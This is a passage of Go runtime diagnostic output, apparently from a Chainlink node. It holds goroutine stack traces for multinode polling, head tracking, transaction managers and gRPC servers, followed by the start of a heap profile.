/go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/utils/sleeper_task.go:117 +0xfb
created by github.com/smartcontractkit/chainlink-common/pkg/utils.NewSleeperTaskCtx.func1 in goroutine 191
/go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/utils/sleeper_task.go:60 +0x56
goroutine 170 [select, 1 minutes]:
github.com/smartcontractkit/chainlink-common/pkg/services.StopRChan.CtxCancel.func1()
/go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/services/stop_!race.go:11 +0x69
created by github.com/smartcontractkit/chainlink-common/pkg/services.StopRChan.CtxCancel in goroutine 252
/go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/services/stop_!race.go:10 +0x8f
goroutine 253 [select, 1 minutes]:
github.com/smartcontractkit/chainlink-common/pkg/timeutil.(*Ticker).run(0x3b96a6c4b788, 0x3b96a7a3dc00, 0x3b96a7607860)
/go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/timeutil/ticker.go:29 +0xb0
created by github.com/smartcontractkit/chainlink-common/pkg/timeutil.NewTicker in goroutine 191
/go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/timeutil/ticker.go:19 +0x119
goroutine 254 [select, 1 minutes]:
github.com/smartcontractkit/chainlink-common/pkg/services.(*Engine).GoTick.func1({0x2860080, 0x3b96a6f047d0})
/go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/services/service.go:100 +0xe5
github.com/smartcontractkit/chainlink-common/pkg/services.(*Engine).GoTick.(*Engine).Go.func2()
/go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/services/service.go:72 +0x43
sync.(*WaitGroup).Go.func1()
/usr/local/go/src/sync/waitgroup.go:258 +0x4a
created by sync.(*WaitGroup).Go in goroutine 191
/usr/local/go/src/sync/waitgroup.go:238 +0x73
goroutine 222 [IO wait, 1 minutes]:
internal/poll.runtime_pollWait(0x7319183f3200, 0x72)
/usr/local/go/src/runtime/netpoll.go:351 +0x85
internal/poll.(*pollDesc).wait(0x3b96a786d300?, 0x20?, 0x0)
/usr/local/go/src/internal/poll/fd_poll_runtime.go:84 +0x27
internal/poll.(*pollDesc).waitRead(...)
/usr/local/go/src/internal/poll/fd_poll_runtime.go:89
internal/poll.(*FD).Accept(0x3b96a786d300)
/usr/local/go/src/internal/poll/fd_unix.go:613 +0x28c
net.(*netFD).accept(0x3b96a786d300)
/usr/local/go/src/net/fd_unix.go:150 +0x29
net.(*UnixListener).accept(0x3b96a774fd90?)
/usr/local/go/src/net/unixsock_posix.go:172 +0x16
net.(*UnixListener).Accept(0x3b96a75490e0)
/usr/local/go/src/net/unixsock.go:267 +0x30
google.golang.org/grpc.(*Server).Serve(0x3b96a6e14b48, {0x28577a0, 0x3b96a713ad68})
/go/pkg/mod/google.golang.org/grpc@v1.81.0/server.go:921 +0x45c
github.com/smartcontractkit/chainlink-common/pkg/loop/internal/net.(*BrokerExt).Serve.func1()
/go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/loop/internal/net/broker.go:117 +0xa5
sync.(*WaitGroup).Go.func1()
/usr/local/go/src/sync/waitgroup.go:258 +0x4a
created by sync.(*WaitGroup).Go in goroutine 191
/usr/local/go/src/sync/waitgroup.go:238 +0x73
goroutine 256 [select]:
github.com/smartcontractkit/chainlink-framework/multinode.(*MultiNode[...]).runLoop(0x289afe0, {0x2860080, 0x3b96a6f04820})
/go/pkg/mod/github.com/smartcontractkit/chainlink-framework/multinode@v0.0.0-20260521164805-26d78d5e1243/multi_node.go:343 +0x2e5
github.com/smartcontractkit/chainlink-framework/multinode.(*MultiNode[...]).start.(*Engine).Go.func3()
/go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/services/service.go:72 +0x43
sync.(*WaitGroup).Go.func1()
/usr/local/go/src/sync/waitgroup.go:258 +0x4a
created by sync.(*WaitGroup).Go in goroutine 191
/usr/local/go/src/sync/waitgroup.go:238 +0x73
goroutine 285 [select]:
google.golang.org/grpc/internal/transport.(*controlBuffer).get(0x3b96a7596140, 0x1)
/go/pkg/mod/google.golang.org/grpc@v1.81.0/internal/transport/controlbuf.go:420 +0x10a
google.golang.org/grpc/internal/transport.(*loopyWriter).run(0x3b96a734c500)
/go/pkg/mod/google.golang.org/grpc@v1.81.0/internal/transport/controlbuf.go:597 +0x78
google.golang.org/grpc/internal/transport.NewServerTransport.func3()
/go/pkg/mod/google.golang.org/grpc@v1.81.0/internal/transport/http2_server.go:342 +0xdc
created by google.golang.org/grpc/internal/transport.NewServerTransport in goroutine 284
/go/pkg/mod/google.golang.org/grpc@v1.81.0/internal/transport/http2_server.go:340 +0x18e7
goroutine 264 [select]:
github.com/smartcontractkit/chainlink-common/pkg/timeutil.(*Ticker).run(0x3b96a7278738, 0x3b96a6c93490, 0x3b96a710f110)
/go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/timeutil/ticker.go:29 +0xb0
created by github.com/smartcontractkit/chainlink-common/pkg/timeutil.NewTicker in goroutine 256
/go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/timeutil/ticker.go:19 +0x119
goroutine 280 [select, 1 minutes]:
github.com/smartcontractkit/chainlink-framework/chains/heads.(*tracker[...]).backfillLoop(0x28a0740, {0x2860080, 0x3b96a7079b80})
/go/pkg/mod/github.com/smartcontractkit/chainlink-framework/chains@v0.0.0-20260724153515-bb6a2de39bcb/heads/tracker.go:382 +0x90
github.com/smartcontractkit/chainlink-common/pkg/services.(*Engine).Go.func1()
/go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/services/service.go:72 +0x43
sync.(*WaitGroup).Go.func1()
/usr/local/go/src/sync/waitgroup.go:258 +0x4a
created by sync.(*WaitGroup).Go in goroutine 191
/usr/local/go/src/sync/waitgroup.go:238 +0x73
goroutine 219 [select, 1 minutes]:
github.com/smartcontractkit/chainlink-common/pkg/services.StopRChan.CtxCancel.func1()
/go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/services/stop_!race.go:11 +0x69
created by github.com/smartcontractkit/chainlink-common/pkg/services.StopRChan.CtxCancel in goroutine 278
/go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/services/stop_!race.go:10 +0x8f
goroutine 269 [select]:
github.com/smartcontractkit/chainlink-framework/multinode.(*node[...]).aliveLoop(0x28a37e0)
/go/pkg/mod/github.com/smartcontractkit/chainlink-framework/multinode@v0.0.0-20260521164805-26d78d5e1243/node_lifecycle.go:121 +0xf65
created by github.com/smartcontractkit/chainlink-framework/multinode.(*node[...]).declareAlive.func4 in goroutine 255
/go/pkg/mod/github.com/smartcontractkit/chainlink-framework/multinode@v0.0.0-20260521164805-26d78d5e1243/node_fsm.go:175 +0x127
goroutine 270 [select, 1 minutes]:
github.com/smartcontractkit/chainlink-common/pkg/services.StopRChan.CtxCancel.func1()
/go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/services/stop_!race.go:11 +0x69
created by github.com/smartcontractkit/chainlink-common/pkg/services.StopRChan.CtxCancel in goroutine 269
/go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/services/stop_!race.go:10 +0x8f
goroutine 276 [select, 1 minutes]:
github.com/smartcontractkit/chainlink-framework/chains/txmgr.(*Confirmer[...]).runLoop(0x28aa820)
/go/pkg/mod/github.com/smartcontractkit/chainlink-framework/chains@v0.0.0-20260724153515-bb6a2de39bcb/txmgr/confirmer.go:202 +0xf8
created by github.com/smartcontractkit/chainlink-framework/chains/txmgr.(*Confirmer[...]).startInternal in goroutine 191
/go/pkg/mod/github.com/smartcontractkit/chainlink-framework/chains@v0.0.0-20260724153515-bb6a2de39bcb/txmgr/confirmer.go:148 +0x2ed
goroutine 277 [select, 1 minutes]:
github.com/smartcontractkit/chainlink-common/pkg/services.StopRChan.CtxCancel.func1()
/go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/services/stop_!race.go:11 +0x69
created by github.com/smartcontractkit/chainlink-common/pkg/services.StopRChan.CtxCancel in goroutine 276
/go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/services/stop_!race.go:10 +0x8f
goroutine 273 [select]:
github.com/smartcontractkit/chainlink-framework/multinode.(*Poller[...]).pollingLoop(0x3b96a6c93a40, {0x2860080?, 0x3b96a6f04e10})
/go/pkg/mod/github.com/smartcontractkit/chainlink-framework/multinode@v0.0.0-20260521164805-26d78d5e1243/poller.go:72 +0xe5
github.com/smartcontractkit/chainlink-framework/multinode.(*Poller[...]).start.(*Engine).Go.func2()
/go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/services/service.go:72 +0x43
sync.(*WaitGroup).Go.func1()
/usr/local/go/src/sync/waitgroup.go:258 +0x4a
created by sync.(*WaitGroup).Go in goroutine 269
/usr/local/go/src/sync/waitgroup.go:238 +0x73
goroutine 290 [select, 1 minutes]:
github.com/smartcontractkit/chainlink-common/pkg/services.StopRChan.CtxCancel.func1()
/go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/services/stop_!race.go:11 +0x69
created by github.com/smartcontractkit/chainlink-common/pkg/services.StopRChan.CtxCancel in goroutine 273
/go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/services/stop_!race.go:10 +0x8f
goroutine 291 [select]:
github.com/smartcontractkit/chainlink-common/pkg/timeutil.(*Ticker).run(0x3b96a7278ba0, 0x3b96a6c93ab0, 0x3b96a763c480)
/go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/timeutil/ticker.go:29 +0xb0
created by github.com/smartcontractkit/chainlink-common/pkg/timeutil.NewTicker in goroutine 273
/go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/timeutil/ticker.go:19 +0x119
goroutine 257 [select, 1 minutes]:
github.com/smartcontractkit/chainlink-common/pkg/services.StopRChan.CtxCancel.func1()
/go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/services/stop_!race.go:11 +0x69
created by github.com/smartcontractkit/chainlink-common/pkg/services.StopRChan.CtxCancel in goroutine 303
/go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/services/stop_!race.go:10 +0x8f
goroutine 279 [select, 1 minutes]:
github.com/smartcontractkit/chainlink-framework/chains/heads.(*listener[...]).receiveHeaders(0x28868a0, {0x2860080, 0x3b96a6f05720}, 0x3b96a6c4b578)
/go/pkg/mod/github.com/smartcontractkit/chainlink-framework/chains@v0.0.0-20260724153515-bb6a2de39bcb/heads/listener.go:157 +0x1c6
github.com/smartcontractkit/chainlink-framework/chains/heads.(*listener[...]).ListenForNewHeads(0x28868a0, {0x2860080, 0x3b96a6f05720})
/go/pkg/mod/github.com/smartcontractkit/chainlink-framework/chains@v0.0.0-20260724153515-bb6a2de39bcb/heads/listener.go:116 +0x11a
github.com/smartcontractkit/chainlink-common/pkg/services.(*Engine).Go.func1()
/go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/services/service.go:72 +0x43
sync.(*WaitGroup).Go.func1()
/usr/local/go/src/sync/waitgroup.go:258 +0x4a
created by sync.(*WaitGroup).Go in goroutine 191
/usr/local/go/src/sync/waitgroup.go:238 +0x73
goroutine 278 [select, 1 minutes]:
github.com/smartcontractkit/chainlink-framework/chains/heads.(*broadcaster[...]).run(0x2884700, {0x2860080, 0x3b96a77583c0})
/go/pkg/mod/github.com/smartcontractkit/chainlink-framework/chains@v0.0.0-20260724153515-bb6a2de39bcb/heads/broadcaster.go:113 +0xa5
github.com/smartcontractkit/chainlink-common/pkg/services.(*Engine).Go.func1()
/go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/services/service.go:72 +0x43
sync.(*WaitGroup).Go.func1()
/usr/local/go/src/sync/waitgroup.go:258 +0x4a
created by sync.(*WaitGroup).Go in goroutine 191
/usr/local/go/src/sync/waitgroup.go:238 +0x73
goroutine 303 [select, 1 minutes]:
github.com/smartcontractkit/chainlink-evm/pkg/txmgr.(*evmFinalizer).runLoop(0x3b96a6f839e0)
/go/pkg/mod/github.com/smartcontractkit/chainlink-evm@v0.3.4-0.20260728111445-96c471be2872/pkg/txmgr/finalizer.go:167 +0xf0
created by github.com/smartcontractkit/chainlink-evm/pkg/txmgr.(*evmFinalizer).Start.func1 in goroutine 191
/go/pkg/mod/github.com/smartcontractkit/chainlink-evm@v0.3.4-0.20260728111445-96c471be2872/pkg/txmgr/finalizer.go:139 +0x185
goroutine 304 [select, 1 minutes]:
github.com/smartcontractkit/chainlink-framework/chains/txmgr.(*Txm[...]).runLoop(0x28a4220)
/go/pkg/mod/github.com/smartcontractkit/chainlink-framework/chains@v0.0.0-20260724153515-bb6a2de39bcb/txmgr/txmgr.go:481 +0x24d
created by github.com/smartcontractkit/chainlink-framework/chains/txmgr.(*Txm[...]).Start.func1 in goroutine 191
/go/pkg/mod/github.com/smartcontractkit/chainlink-framework/chains@v0.0.0-20260724153515-bb6a2de39bcb/txmgr/txmgr.go:245 +0x551
goroutine 305 [select, 1 minutes]:
github.com/smartcontractkit/chainlink-common/pkg/services.StopRChan.CtxCancel.func1()
/go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/services/stop_!race.go:11 +0x69
created by github.com/smartcontractkit/chainlink-common/pkg/services.StopRChan.CtxCancel in goroutine 304
/go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/services/stop_!race.go:10 +0x8f
goroutine 306 [select, 1 minutes]:
github.com/smartcontractkit/chainlink-common/pkg/timeutil.(*Ticker).run(0x3b96a7278fc0, 0x3b96a760e620, 0x3b96a763d4d0)
/go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/timeutil/ticker.go:29 +0xb0
created by github.com/smartcontractkit/chainlink-common/pkg/timeutil.NewTicker in goroutine 304
/go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/timeutil/ticker.go:19 +0x119
goroutine 281 [select, 1 minutes]:
github.com/smartcontractkit/chainlink-framework/chains/heads.(*tracker[...]).broadcastLoop(0x28a0740, {0x2860080, 0x3b96a7079bd0})
/go/pkg/mod/github.com/smartcontractkit/chainlink-framework/chains@v0.0.0-20260724153515-bb6a2de39bcb/heads/tracker.go:364 +0x1cc
github.com/smartcontractkit/chainlink-common/pkg/services.(*Engine).Go.func1()
/go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/services/service.go:72 +0x43
sync.(*WaitGroup).Go.func1()
/usr/local/go/src/sync/waitgroup.go:258 +0x4a
created by sync.(*WaitGroup).Go in goroutine 191
/usr/local/go/src/sync/waitgroup.go:238 +0x73
goroutine 307 [select, 1 minutes]:
github.com/smartcontractkit/chainlink-common/pkg/services.StopRChan.CtxCancel.func1()
/go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/services/stop_!race.go:11 +0x69
created by github.com/smartcontractkit/chainlink-common/pkg/services.StopRChan.CtxCancel in goroutine 279
/go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/services/stop_!race.go:10 +0x8f
goroutine 282 [select, 1 minutes]:
github.com/smartcontractkit/chainlink-common/pkg/services.StopRChan.CtxCancel.func1()
/go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/services/stop_!race.go:11 +0x69
created by github.com/smartcontractkit/chainlink-common/pkg/services.StopRChan.CtxCancel in goroutine 280
/go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/services/stop_!race.go:10 +0x8f
goroutine 283 [select, 1 minutes]:
github.com/smartcontractkit/chainlink-common/pkg/services.StopRChan.CtxCancel.func1()
/go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/services/stop_!race.go:11 +0x69
created by github.com/smartcontractkit/chainlink-common/pkg/services.StopRChan.CtxCancel in goroutine 281
/go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/services/stop_!race.go:10 +0x8f
goroutine 223 [select, 1 minutes]:
github.com/smartcontractkit/chainlink-common/pkg/loop/internal/net.(*BrokerExt).Serve.func2()
/go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/loop/internal/net/broker.go:124 +0x59
sync.(*WaitGroup).Go.func1()
/usr/local/go/src/sync/waitgroup.go:258 +0x4a
created by sync.(*WaitGroup).Go in goroutine 191
/usr/local/go/src/sync/waitgroup.go:238 +0x73
goroutine 287 [IO wait]:
internal/poll.runtime_pollWait(0x7319183f3400, 0x72)
/usr/local/go/src/runtime/netpoll.go:351 +0x85
internal/poll.(*pollDesc).wait(0x13?, 0xa?, 0x0)
/usr/local/go/src/internal/poll/fd_poll_runtime.go:84 +0x27
internal/poll.(*pollDesc).waitRead(...)
/usr/local/go/src/internal/poll/fd_poll_runtime.go:89
internal/poll.(*FD).RawRead(0x3b96a6f1de80, 0x3b96a786ef90)
/usr/local/go/src/internal/poll/fd_unix.go:710 +0x125
net.(*rawConn).Read(0x3b96a7b0a140, 0x3b96a7a08bb8?)
/usr/local/go/src/net/rawconn.go:44 +0x36
google.golang.org/grpc/internal/transport/readyreader.(*nonBlockingReader).ReadOnReady(0x3b96a7079c20, 0x3b96a7a08c18?, {0x2853ab8, 0x3b96a7985cb0})
/go/pkg/mod/google.golang.org/grpc@v1.81.0/internal/transport/readyreader/ready_reader.go:114 +0xa7
google.golang.org/grpc/internal/transport/readyreader.(*bufReadyReader).Read(0x3b96a6f695e0, {0x3b96a712c3c4, 0x9, 0x3b96a7a08c58?})
/go/pkg/mod/google.golang.org/grpc@v1.81.0/internal/transport/readyreader/ready_reader.go:221 +0x174
io.ReadAtLeast({0x283e020, 0x3b96a6f695e0}, {0x3b96a712c3c4, 0x9, 0x9}, 0x9)
/usr/local/go/src/io/io.go:335 +0x8e
io.ReadFull(...)
/usr/local/go/src/io/io.go:354
golang.org/x/net/http2.readFrameHeader({0x3b96a712c3c4, 0x9, 0x8f935a?}, {0x283e020?, 0x3b96a6f695e0?})
/go/pkg/mod/golang.org/x/net@v0.55.0/http2/frame.go:250 +0x65
golang.org/x/net/http2.(*Framer).ReadFrameHeader(0x3b96a712c380)
/go/pkg/mod/golang.org/x/net@v0.55.0/http2/frame.go:513 +0x6b
google.golang.org/grpc/internal/transport.(*framer).readFrame(0x3b96a772a080)
/go/pkg/mod/google.golang.org/grpc@v1.81.0/internal/transport/http_util.go:493 +0x45
google.golang.org/grpc/internal/transport.(*http2Server).HandleStreams(0x3b96a6ff7040, {0x2860048, 0x3b96a7053170}, 0x3b96a7053200)
/go/pkg/mod/google.golang.org/grpc@v1.81.0/internal/transport/http2_server.go:638 +0xff
google.golang.org/grpc.(*Server).serveStreams(0x3b96a6e14b48, {0x2860128?, 0x41e1780?}, {0x28616f8, 0x3b96a6ff7040}, {0x2873c68?, 0x3b96a7b0a138?})
/go/pkg/mod/google.golang.org/grpc@v1.81.0/server.go:1059 +0x368
google.golang.org/grpc.(*Server).handleRawConn.func1()
/go/pkg/mod/google.golang.org/grpc@v1.81.0/server.go:993 +0x56
created by google.golang.org/grpc.(*Server).handleRawConn in goroutine 284
/go/pkg/mod/google.golang.org/grpc@v1.81.0/server.go:992 +0x1cb
goroutine 286 [select, 1 minutes]:
google.golang.org/grpc/internal/transport.(*http2Server).keepalive(0x3b96a6ff7040)
/go/pkg/mod/google.golang.org/grpc@v1.81.0/internal/transport/http2_server.go:1203 +0x1e5
created by google.golang.org/grpc/internal/transport.NewServerTransport in goroutine 284
/go/pkg/mod/google.golang.org/grpc@v1.81.0/internal/transport/http2_server.go:363 +0x1929
goroutine 327 [select, 1 minutes]:
github.com/smartcontractkit/chainlink-common/pkg/services.StopRChan.CtxCancel.func1()
/go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/services/stop_!race.go:11 +0x69
created by github.com/smartcontractkit/chainlink-common/pkg/services.StopRChan.CtxCancel in goroutine 326
/go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/services/stop_!race.go:10 +0x8f
goroutine 361 [select]:
github.com/smartcontractkit/chainlink-common/pkg/timeutil.(*Ticker).run(0x3b96a6d67bc0, 0x3b96a7010e70, 0x3b96a7799650)
/go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/timeutil/ticker.go:29 +0xb0
created by github.com/smartcontractkit/chainlink-common/pkg/timeutil.NewTicker in goroutine 350
/go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/timeutil/ticker.go:19 +0x119
goroutine 326 [select, 1 minutes]:
github.com/smartcontractkit/chainlink-framework/chains/txmgr.(*Broadcaster[...]).monitorTxs(0x28a3180, {0x83, 0x1d, 0x9c, 0x3d, 0xc5, 0x63, 0x91, 0x15, 0x17, ...}, ...)
/go/pkg/mod/github.com/smartcontractkit/chainlink-framework/chains@v0.0.0-20260724153515-bb6a2de39bcb/txmgr/broadcaster.go:331 +0x5c5
created by github.com/smartcontractkit/chainlink-framework/chains/txmgr.(*Broadcaster[...]).loadAndMonitor in goroutine 275
/go/pkg/mod/github.com/smartcontractkit/chainlink-framework/chains@v0.0.0-20260724153515-bb6a2de39bcb/txmgr/broadcaster.go:218 +0x185
goroutine 360 [select, 1 minutes]:
github.com/smartcontractkit/chainlink-common/pkg/services.StopRChan.CtxCancel.func1()
/go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/services/stop_!race.go:11 +0x69
created by github.com/smartcontractkit/chainlink-common/pkg/services.StopRChan.CtxCancel in goroutine 350
/go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/services/stop_!race.go:10 +0x8f
goroutine 350 [select]:
github.com/smartcontractkit/chainlink-framework/multinode.(*Poller[...]).pollingLoop(0x3b96a75fdc00, {0x2860080?, 0x3b96a6dd93b0})
/go/pkg/mod/github.com/smartcontractkit/chainlink-framework/multinode@v0.0.0-20260521164805-26d78d5e1243/poller.go:72 +0xe5
github.com/smartcontractkit/chainlink-framework/multinode.(*Poller[...]).start.(*Engine).Go.func2()
/go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/services/service.go:72 +0x43
sync.(*WaitGroup).Go.func1()
/usr/local/go/src/sync/waitgroup.go:258 +0x4a
created by sync.(*WaitGroup).Go in goroutine 279
/usr/local/go/src/sync/waitgroup.go:238 +0x73
goroutine 771 [IO wait]:
internal/poll.runtime_pollWait(0x7319183f2e00, 0x72)
/usr/local/go/src/runtime/netpoll.go:351 +0x85
internal/poll.(*pollDesc).wait(0x3b96a77d5600?, 0x3b96a7b3cbe1?, 0x0)
/usr/local/go/src/internal/poll/fd_poll_runtime.go:84 +0x27
internal/poll.(*pollDesc).waitRead(...)
/usr/local/go/src/internal/poll/fd_poll_runtime.go:89
internal/poll.(*FD).Read(0x3b96a77d5600, {0x3b96a7b3cbe1, 0x1, 0x1})
/usr/local/go/src/internal/poll/fd_unix.go:165 +0x2ae
net.(*netFD).Read(0x3b96a77d5600, {0x3b96a7b3cbe1?, 0x408cde0?, 0x3b96a7714770?})
/usr/local/go/src/net/fd_posix.go:68 +0x25
net.(*conn).Read(0x3b96a71922a8, {0x3b96a7b3cbe1?, 0x40d2201?, 0x100000001?})
/usr/local/go/src/net/net.go:196 +0x45
net/http.(*connReader).backgroundRead(0x3b96a7b3cbc0)
/usr/local/go/src/net/http/server.go:702 +0x33
created by net/http.(*connReader).startBackgroundRead in goroutine 766
/usr/local/go/src/net/http/server.go:698 +0xb6
heap profile: 20: 1057536 [36: 1142936] @ heap/1048576
0: 0 [1: 16384] @ 0x48e88c 0x493c69 0x6f07ee 0x6f0485 0x6f0235 0x13827d4 0x1bba165 0x1bb5b26 0x469115 0x4596d0 0x4596a7 0x4994c1
# 0x6f07ed encoding/json.(*Decoder).refill+0xed /usr/local/go/src/encoding/json/stream.go:161
# 0x6f0484 encoding/json.(*Decoder).readValue+0x84 /usr/local/go/src/encoding/json/stream.go:142
# 0x6f0234 encoding/json.(*Decoder).Decode+0x74 /usr/local/go/src/encoding/json/stream.go:65
# 0x13827d3 github.com/ethereum/go-ethereum/accounts/abi.JSON+0xb3 /go/pkg/mod/github.com/ethereum/go-ethereum@v1.17.3/accounts/abi/abi.go:52
# 0x1bba164 github.com/smartcontractkit/chainlink-evm/pkg/llo.makeConfigDigestArgs+0xc4 /go/pkg/mod/github.com/smartcontractkit/chainlink-evm@v0.3.4-0.20260728111445-96c471be2872/pkg/llo/offchain_config_digester.go:80
# 0x1bb5b25 github.com/smartcontractkit/chainlink-evm/pkg/llo.init+0xc5 /go/pkg/mod/github.com/smartcontractkit/chainlink-evm@v0.3.4-0.20260728111445-96c471be2872/pkg/llo/offchain_config_digester.go:88
# 0x469114 runtime.doInit1+0xd4 /usr/local/go/src/runtime/proc.go:8103
# 0x4596cf runtime.doInit+0x26f /usr/local/go/src/runtime/proc.go:8070
# 0x4596a6 runtime.main+0x246 /usr/local/go/src/runtime/proc.go:258
0: 0 [1: 96] @ 0x48e865 0x493c69 0x6d7a67 0x6d4fa4 0x6d7965 0x138fdac 0x1b701bd 0x1b70220 0x1b6a0d8 0x469115 0x4596d0 0x4596a7 0x4994c1
# 0x6d7a66 regexp.(*Regexp).FindAllStringSubmatch.func1+0xa6 /usr/local/go/src/regexp/regexp.go:1180
# 0x6d4fa3 regexp.(*Regexp).allMatches+0x2c3 /usr/local/go/src/regexp/regexp.go:790
# 0x6d7964 regexp.(*Regexp).FindAllStringSubmatch+0x64 /usr/local/go/src/regexp/regexp.go:1176
# 0x138fdab github.com/ethereum/go-ethereum/accounts/abi.NewType+0x62b /go/pkg/mod/github.com/ethereum/go-ethereum@v1.17.3/accounts/abi/type.go:119
# 0x1b701bc github.com/smartcontractkit/chainlink-data-streams/mercury.getPayloadTypes.func1+0x4bc /go/pkg/mod/github.com/smartcontractkit/chainlink-data-streams@v0.1.15-0.20260522094612-5f9f748bd87a/mercury/transmitter.go:133
# 0x1b7021f github.com/smartcontractkit/chainlink-data-streams/mercury.getPayloadTypes+0x51f /go/pkg/mod/github.com/smartcontractkit/chainlink-data-streams@v0.1.15-0.20260522094612-5f9f748bd87a/mercury/transmitter.go:144
# 0x1b6a0d7 github.com/smartcontractkit/chainlink-data-streams/mercury.init+0xa37 /go/pkg/mod/github.com/smartcontractkit/chainlink-data-streams@v0.1.15-0.20260522094612-5f9f748bd87a/mercury/transmitter.go:129
# 0x469114 runtime.doInit1+0xd4 /usr/local/go/src/runtime/proc.go:8103
# 0x4596cf runtime.doInit+0x26f /usr/local/go/src/runtime/proc.go:8070
# 0x4596a6 runtime.main+0x246 /usr/local/go/src/runtime/proc.go:258
0: 0 [0: 0] @ 0x48e865 0x4287c5 0xa2105a 0xa1a848 0xa1a817 0xa19739 0xa1ce5a 0x4994c1
# 0xa21059 github.com/prometheus/client_golang/prometheus.NewConstMetric+0x79 /go/pkg/mod/github.com/prometheus/client_golang@v1.23.2/prometheus/value.go:113
# 0xa1a847 github.com/prometheus/client_golang/prometheus.MustNewConstMetric+0x1067 /go/pkg/mod/github.com/prometheus/client_golang@v1.23.2/prometheus/value.go:127
# 0xa1a816 github.com/prometheus/client_golang/prometheus.(*processCollector).processCollect+0x1036 /go/pkg/mod/github.com/prometheus/client_golang@v1.23.2/prometheus/process_collector_procfsenabled.go:75
# 0xa19738 github.com/prometheus/client_golang/prometheus.(*processCollector).Collect+0x18 /go/pkg/mod/github.com/prometheus/client_golang@v1.23.2/prometheus/process_collector.go:147
# 0xa1ce59 github.com/prometheus/client_golang/prometheus.(*Registry).Gather.func1+0xf9 /go/pkg/mod/github.com/prometheus/client_golang@v1.23.2/prometheus/registry.go:456
0: 0 [0: 0] @ 0x48e88c 0x493c69 0x8a1925 0x8a18e6 0x89f5f2 0x89f435 0x4994c1
# 0x8a1924 bufio.NewWriterSize+0x15c4 /usr/local/go/src/bufio/bufio.go:599
# 0x8a18e5 net/http.(*Transport).dialConn+0x1585 /usr/local/go/src/net/http/transport.go:1992
# 0x89f5f1 net/http.(*Transport).dialConnFor+0xd1 /usr/local/go/src/net/http/transport.go:1648
